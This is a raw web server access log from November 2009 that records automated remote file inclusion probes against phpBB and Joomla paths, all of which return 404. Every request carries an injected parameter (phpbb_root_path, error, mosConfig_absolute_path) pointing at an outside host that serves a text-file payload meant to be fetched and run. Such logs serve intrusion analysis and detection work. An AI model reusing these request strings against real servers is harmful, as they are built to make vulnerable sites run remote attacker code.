210.97.237.144 - - [01/Nov/2009:00:39:24 -0400] "GET /logs//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://informatikairc.fileave.com/enda-id1.txt? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
210.97.237.144 - - [01/Nov/2009:00:39:27 -0400] "GET //PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://informatikairc.fileave.com/enda-id1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
210.97.237.144 - - [01/Nov/2009:00:39:27 -0400] "GET /logs/access_log.Q109052200//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://informatikairc.fileave.com/enda-id1.txt? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
210.97.237.144 - - [01/Nov/2009:00:39:27 -0400] "GET /logs//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://informatikairc.fileave.com/enda-id1.txt? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
66.244.236.249 - - [01/Nov/2009:00:39:30 -0400] "GET /logs/access_log.Q109080200/components/com_extcalendar/errors.php?error=http://www.jejucasa.com/bbs//include/idsuper.txt?? HTTP/1.1" 404 262 "-" "libwww-perl/5.805"
66.244.236.249 - - [01/Nov/2009:00:39:30 -0400] "GET /components/com_extcalendar/errors.php?error=http://www.jejucasa.com/bbs//include/idsuper.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
66.244.236.249 - - [01/Nov/2009:00:39:31 -0400] "GET /logs/components/com_extcalendar/errors.php?error=http://www.jejucasa.com/bbs//include/idsuper.txt?? HTTP/1.1" 404 240 "-" "libwww-perl/5.805"
58.230.123.88 - - [01/Nov/2009:00:39:35 -0400] "GET /logs/access_log.Q109080200///index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.thaiantitobacco.com/lamb//copyright.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
58.230.123.88 - - [01/Nov/2009:00:39:36 -0400] "GET /logs/error_log.Q109080200///index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.thaiantitobacco.com/lamb//copyright.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
114.4.8.14 - - [01/Nov/2009:00:40:16 -0400] "GET /logs/access_log.Q109080200///index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.thaiantitobacco.com/lamb//copyright.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
114.4.8.14 - - [01/Nov/2009:00:40:22 -0400] "GET /logs/error_log.Q109080200///index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.thaiantitobacco.com/lamb//copyright.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
66.244.236.249 - - [01/Nov/2009:00:40:24 -0400] "GET /logs/error_log.Q109080200/components/com_extcalendar/errors.php?error=http://www.jejucasa.com/bbs//include/idsuper.txt?? HTTP/1.1" 404 261 "-" "libwww-perl/5.805"
